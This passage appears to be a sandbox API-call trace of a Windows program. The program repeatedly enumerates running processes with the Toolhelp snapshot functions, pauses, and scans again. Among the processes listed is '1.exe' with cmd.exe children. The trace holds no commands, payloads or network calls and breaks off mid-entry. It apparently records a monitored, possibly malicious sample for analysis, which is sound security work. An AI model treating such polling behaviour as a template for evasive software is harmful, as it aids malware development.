[0047.820] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0047.820] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0047.821] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0047.822] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0047.822] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0047.823] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0047.824] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0047.824] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0047.825] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0047.826] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0047.826] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0047.827] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0047.828] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0047.828] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0047.829] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0047.830] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0048.106] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0048.106] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0048.107] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0048.108] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0048.109] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0048.109] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0048.110] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0048.111] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0048.111] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0048.112] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0048.113] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0048.113] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0048.114] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0048.115] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0048.116] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0048.117] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0048.117] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0048.118] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0048.119] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0048.120] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0048.120] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0048.121] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0048.122] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0048.123] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.124] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.125] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0048.125] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0048.126] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.127] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0048.127] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0048.128] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.129] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.129] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0048.130] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.131] Process32NextW (in: hSnapshot=0x320, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0048.131] CloseHandle (hObject=0x320) returned 1 [0048.132] Sleep (dwMilliseconds=0x1f4) [0049.182] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x348 [0049.188] Process32FirstW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0049.189] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0049.190] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0049.191] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.191] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0049.192] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.192] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0049.193] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0049.194] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0049.194] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.195] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0049.196] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0049.196] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.197] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0049.198] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x55, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.198] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.200] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.200] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.201] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.202] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.202] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.203] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.204] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.204] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0049.205] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.206] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.206] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0049.207] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0049.207] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.208] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0049.209] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0049.210] Process32NextW (in: hSnapshot=0x348, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, 